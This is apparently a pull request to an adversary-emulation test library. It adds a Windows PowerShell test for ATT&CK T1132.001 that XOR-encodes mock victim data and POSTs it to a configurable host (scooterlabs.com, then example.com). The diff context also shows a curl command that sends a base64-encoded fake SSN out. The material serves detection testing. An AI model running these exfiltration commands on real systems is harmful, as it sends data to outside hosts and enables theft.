### PR TITLE
Added a new test - XOR Encoded data to T1132.001 'Data Encoding: Standard Encoding

### DIFF
--- a/atomics/T1132.001/T1132.001.yaml
+++ b/atomics/T1132.001/T1132.001.yaml
@@ -22,4 +22,35 @@ atomic_tests:
       echo -n 111-11-1111 | base64
       curl -XPOST #{base64_data}.#{destination_url}
     name: sh
+- name: XOR Encoded data.
+  description: |
+    XOR encodes the data with a XOR key.
+    Reference - https://gist.github.com/loadenmb/8254cee0f0287b896a05dcdc8a30042f
+  supported_platforms:
+  - windows
+  input_arguments:
+    destination_url:
+      description: Destination URL to post encoded data.
+      type: string
+      default: scooterlabs.com
+    plaintext:
+      description: Plain text mimicing victim data sent to C2 server.
+      type: string
+      default: Path\n----\nC:\Users\victim
+    key:
+      description: XOR key used for encoding the plaintext.
+      type: string
+      default: abcdefghijklmnopqrstuvwxyz123456
+  executor:
+    command: |
+      $plaintext = ([system.Text.Encoding]::UTF8.getBytes("#{plaintext}"))
+      $key = "#{key}"
+      $cyphertext =  @();
+      for ($i = 0; $i -lt $plaintext.Count; $i++) {
+       $cyphertext += $plaintext[$i] -bxor $key[$i % $key.Length];
+      }
+      $cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext)
+      [System.Net.ServicePointManager]::Expect100Continue = $false
+      Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $cyphertext -DisableKeepAlive
+    name: powershell
 

--- a/atomics/T1132.001/T1132.001.yaml
+++ b/atomics/T1132.001/T1132.001.yaml
@@ -32,9 +32,9 @@ atomic_tests:
     destination_url:
       description: Destination URL to post encoded data.
       type: string
-      default: scooterlabs.com
+      default: example.com
     plaintext:
-      description: Plain text mimicing victim data sent to C2 server.
+      description: Plain text mimicking victim data sent to C2 server.
       type: string
       default: Path\n----\nC:\Users\victim
     key:


### PR DESCRIPTION
Added a new test - XOR Encoded data to T1132.001 'Data Encoding: Standard Encoding

**Details:**
The new test added is for windows powershell. It uses the XOR encoding technique which is a standard encoding technique found in few C2 frameworks. The test is configurable with three parameters - Destination URL, XOR key, Plain text. The XOR logic has been referenced from https://gist.github.com/loadenmb/8254cee0f0287b896a05dcdc8a30042f

**Testing:**
Tested on Powershell version 5.1.19041.610
